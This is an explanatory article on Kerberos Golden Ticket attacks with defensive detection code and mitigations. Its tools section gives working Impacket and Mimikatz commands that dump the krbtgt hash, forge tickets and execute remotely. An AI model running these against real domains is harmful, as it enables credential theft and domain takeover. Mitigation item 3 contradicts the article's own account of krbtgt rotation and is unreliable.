Attack Technique 4: Golden Ticket Attack

Golden Ticket Attacks: An Overview and Mitigation Strategies


Introduction

Golden Ticket attacks exploit the Kerberos authentication protocol in Windows-based networks, enabling attackers to forge Kerberos Ticket Granting Tickets (TGTs). These forged tickets grant unauthorized and persistent access to domain resources, bypassing conventional authentication mechanisms. The key target in this attack is the krbtgt account, which plays a crucial role in encrypting and signing Kerberos tickets.


Attack Overview

  • Exploited Protocol: Kerberos Authentication (Windows Networks)

  • Targeted Account: krbtgt (responsible for domain ticket encryption and signing)

  • Attack Goal: Gain unauthorized access to domain resources and sensitive information.

Attack Process

  1. Initial Breach: The attacker compromises a system within the network.

  2. Privilege Escalation: Attains Domain Administrator privileges, granting access to the krbtgt account.

  3. Data Extraction: Obtains the NTHash of the krbtgt account and the domain’s Security Identifier (SID).

  4. Golden Ticket Creation: Forges a Kerberos TGT with tailored privileges, often mimicking a Domain Administrator account.


Key Characteristics

  • Persistence: The attack bypasses standard authentication checks and remains effective after a single krbtgt password change, because the KDC still honours tickets encrypted with the previous krbtgt key.

  • Broad Access: Grants extensive and enduring network access.

  • Remediation Requirement: To fully invalidate forged tickets, the krbtgt password must be changed twice.


Tools and Techniques to Perform Golden Ticket Attacks

Tool 1: Impacket

Impacket is a collection of Python-based tools that facilitate Kerberos exploitation. The following steps outline its usage:

Step 1: Forging a Golden Ticket

  1. Dump the NTHash of krbtgt Account and Domain SID

    • Tool: secretsdump.py

      Command:

      secretsdump.py Administrator:"Password"@<DC_IP_Address>

      Output:

      • NTHash of krbtgt.

      • Domain SID.

  2. Retrieve Domain SID (if unknown)

    • Tool: lookupsid.py

      Command:

      lookupsid.py EXAMPLE.local/Administrator:"Password"@<DC_IP_Address>

  3. Forge the Golden Ticket

    • Tool: ticketer.py

      Command:

      ticketer.py -nthash <NTHash> -domain-sid "<Domain_SID>" -domain <Domain_Name> <Target_User>

      Example:

      ticketer.py -nthash bf106a6860c6f7b3317c653a38aba33 -domain-sid "S-1-5-21-2049251289-867822404-1193079966" -domain EXAMPLE.local Alice

Step 2: Using the Golden Ticket

  1. Set the Kerberos Ticket Location

    Command:

    export KRB5CCNAME=/path/to/ticket.ccache

  2. Use Impacket for Command Execution

    Command:

    psexec.py EXAMPLE.local/Administrator@$TARGET_NAME -target-ip $TARGET_IP -dc-ip $DC_IP -no-pass -k

Tool 2: Mimikatz

Mimikatz is a powerful tool used for credential extraction and ticket manipulation.

Step 1: Compromising the krbtgt Password Hash

  • Command:

    mimikatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt"

    Output:

    • NTLM hash of krbtgt.

    • AES256_HMAC keys.

Step 2: Forging a Golden Ticket

  • Command:

    mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /aes256:ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5 /id:500 /user:Administrator /groups:GroupNumber /ptt"

Step 3: Using the Forged Ticket

  • The forged ticket can be used to authenticate and access resources within the network, bypassing standard authentication.


Detection Methods for Golden Ticket Attacks

Monitoring specific Windows Security Event IDs on domain controllers and member hosts can help identify potential Golden Ticket attacks:

Key Event IDs:

  1. Event ID 4769: Logs Kerberos Service Ticket requests.

    • Key Fields: Account Name, Service Name, Client Address.

  2. Event ID 4624: Logs successful logins.

    • Key Fields: Account Name, Account Domain, Logon ID.

  3. Event ID 4627: Provides details about the logon requestor account.

    • Key Fields: Security ID, Account Name, Account Domain, Logon ID.

Monitoring Strategies:

  • Look for tickets with unusually long lifetimes.

  • Identify service ticket requests for nonexistent or high-privilege accounts.

  • Correlate log events across multiple systems to detect lateral movement patterns.
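The three monitoring strategies above, turned into detection logic over sample log records. This is an added example and not part of the original page: the event records are constructed samples shaped like the fields of Windows Security events 4768 (TGT request), 4769 (service ticket request) and 4624 (logon), the `KNOWN_ACCOUNTS` set stands in for a directory lookup, and the field names and thresholds are assumptions. The first check uses the fact that a forged TGT is never issued by the domain controller, so service ticket requests appear with no matching TGT request inside the ticket lifetime (10 hours is the default Maximum lifetime for user ticket policy; the example assumes it is unchanged).

```python
"""Detection checks for the Golden Ticket indicators listed above.

Added example, not from the original page. Events are constructed samples;
field names, the 10-hour window and the 30-minute spread window are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data). 'ts' is the event time.
SAMPLE_EVENTS = [
    {"id": 4768, "ts": "2024-03-01T08:00:00", "account": "alice", "client_ip": "10.0.0.5"},
    {"id": 4769, "ts": "2024-03-01T08:05:00", "account": "alice", "client_ip": "10.0.0.5",
     "service": "cifs/files01"},
    # service ticket for 'alice' 19 hours after her only TGT request: TGT lifetime exceeded
    {"id": 4769, "ts": "2024-03-02T03:00:00", "account": "alice", "client_ip": "10.0.0.99",
     "service": "cifs/dc01"},
    # account that does not exist in the directory at all
    {"id": 4769, "ts": "2024-03-02T03:01:00", "account": "ghost", "client_ip": "10.0.0.99",
     "service": "ldap/dc01"},
    {"id": 4624, "ts": "2024-03-02T03:02:00", "account": "ghost", "client_ip": "10.0.0.99",
     "logon_id": "0x3e7a1"},
    {"id": 4624, "ts": "2024-03-02T03:03:00", "account": "alice", "client_ip": "10.0.0.99",
     "logon_id": "0x3e7b2"},
    {"id": 4624, "ts": "2024-03-02T03:04:00", "account": "alice", "client_ip": "10.0.0.23",
     "logon_id": "0x3e7c3"},
]
KNOWN_ACCOUNTS = {"alice", "bob", "svc_backup"}  # stands in for an AD lookup


def _t(ev):
    return datetime.fromisoformat(ev["ts"])


def tgs_without_recent_tgt(events, max_tgt_lifetime=timedelta(hours=10)):
    """Return 4769 events whose account has no 4768 within the TGT lifetime.

    The DC never issued a forged TGT, so every service ticket request made
    with it lacks a preceding TGT request inside the lifetime window.
    """
    tgt_times = defaultdict(list)
    for ev in events:
        if ev["id"] == 4768:
            tgt_times[ev["account"]].append(_t(ev))
    hits = []
    for ev in events:
        if ev["id"] != 4769:
            continue
        t = _t(ev)
        covered = any(timedelta(0) <= (t - tt) <= max_tgt_lifetime
                      for tt in tgt_times[ev["account"]])
        if not covered:
            hits.append(ev)
    return hits


def unknown_accounts(events, known_accounts):
    """Return 4769/4624 events naming an account the directory does not know."""
    return [ev for ev in events
            if ev["id"] in (4769, 4624) and ev["account"].lower() not in known_accounts]


def lateral_movement(events, window=timedelta(minutes=30), min_hosts=2):
    """Map account -> sorted client addresses when one account logs on (4624)
    from at least min_hosts distinct addresses inside the window."""
    logons = defaultdict(list)
    for ev in events:
        if ev["id"] == 4624:
            logons[ev["account"]].append((_t(ev), ev["client_ip"]))
    flagged = {}
    for acct, items in logons.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            ips = {ip for t, ip in items[i:] if t - t0 <= window}
            if len(ips) >= min_hosts:
                flagged[acct] = sorted(ips)
                break
    return flagged


if __name__ == "__main__":
    for ev in tgs_without_recent_tgt(SAMPLE_EVENTS):
        print("4769 without recent TGT:", ev["account"], ev["service"], ev["client_ip"])
    for ev in unknown_accounts(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print("unknown account:", ev["id"], ev["account"])
    print("multi-host logons:", lateral_movement(SAMPLE_EVENTS))
```

In production the 4768/4769 pairing needs the events from every domain controller, since a TGT requested on one DC can be used for service tickets on another; the account check should also tolerate the domain suffix and case differences that appear in real Account Name fields.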


Mitigation Techniques for Golden Ticket Attacks

  1. Restrict Administrative Privileges: Limit administrative privileges across different security boundaries to reduce exposure.

  2. Minimize Elevated Privileges: Use Domain Admin accounts only when necessary and enforce the Principle of Least Privilege.

  3. Regular krbtgt Password Rotation: Change the krbtgt password regularly and twice in quick succession to invalidate forged tickets:

    • The first change invalidates existing tickets.

    • The second ensures complete mitigation.

  4. Deploy Network Segmentation: Isolate critical resources to limit lateral movement opportunities for attackers.

  5. Implement Multi-Factor Authentication (MFA): Strengthen authentication by requiring multiple verification steps.

  6. Use Monitoring and Logging Solutions: Employ tools to continuously monitor Kerberos ticket activity and alert on anomalies.

  7. Conduct Regular Security Audits: Periodically review access logs, account activity, and security policies to detect vulnerabilities.
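Why item 3 requires two changes, shown with a toy model. This is an added example and not code from the page: real Kerberos encrypts the TGT with the krbtgt key, and the model stands in for that with an HMAC tag so the key-acceptance logic can be shown without a Kerberos library. The property being modelled is that the KDC honours tickets under both the current krbtgt key and the immediately previous one, so a single reset still leaves a ticket forged with the stolen key valid; the `ToyKDC` class, its method names and the claims dictionary are assumptions for the example. In a real domain, allow Active Directory replication to complete between the two resets so that every domain controller holds the new key before the old one is retired.

```python
"""Toy model of the two-reset requirement for the krbtgt password.

Added example, not from the original page. HMAC-SHA256 stands in for the
Kerberos ticket encryption; ToyKDC models a KDC that accepts the current
and previous krbtgt key (an assumption reflecting the described behaviour).
"""
import hashlib
import hmac
import json
import os


def seal_tgt(key: bytes, claims: dict) -> bytes:
    """Produce a 'ticket': the claims plus a tag that only the key can make."""
    body = json.dumps(claims, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"|" + tag


class ToyKDC:
    def __init__(self):
        self.current = os.urandom(32)   # krbtgt key, version n
        self.previous = None            # key version n-1, still honoured

    def reset_krbtgt(self):
        """One password change: the old current key becomes the previous key."""
        self.previous, self.current = self.current, os.urandom(32)

    def accepts(self, tgt: bytes) -> bool:
        """Accept a ticket sealed with the current or the previous key."""
        body, _, tag = tgt.rpartition(b"|")
        for key in (self.current, self.previous):
            if key is None:
                continue
            expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
            if hmac.compare_digest(expected, tag):
                return True
        return False


def rotation_demo() -> dict:
    """Forge a ticket with a stolen key, then check it after each reset."""
    kdc = ToyKDC()
    stolen = kdc.current  # models the extracted krbtgt key
    forged = seal_tgt(stolen, {"user": "Administrator", "lifetime_days": 3650})
    results = {"before_reset": kdc.accepts(forged)}
    kdc.reset_krbtgt()
    results["after_one_reset"] = kdc.accepts(forged)   # still accepted via previous key
    kdc.reset_krbtgt()
    results["after_two_resets"] = kdc.accepts(forged)  # stolen key no longer known
    return results


if __name__ == "__main__":
    for stage, ok in rotation_demo().items():
        print(f"{stage}: forged ticket {'ACCEPTED' if ok else 'rejected'}")
```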


Conclusion

Golden Ticket attacks exploit the Kerberos authentication protocol to achieve persistent, unauthorized access to Active Directory environments. By forging TGTs, attackers gain broad network access, bypassing conventional authentication controls.

Effective detection and mitigation strategies, such as krbtgt password rotation, log monitoring, and restricting administrative privileges, are essential to protect against such attacks. Organizations must adopt a proactive security posture, continuously improving their defenses to safeguard critical assets against advanced threats like Golden Ticket attacks.
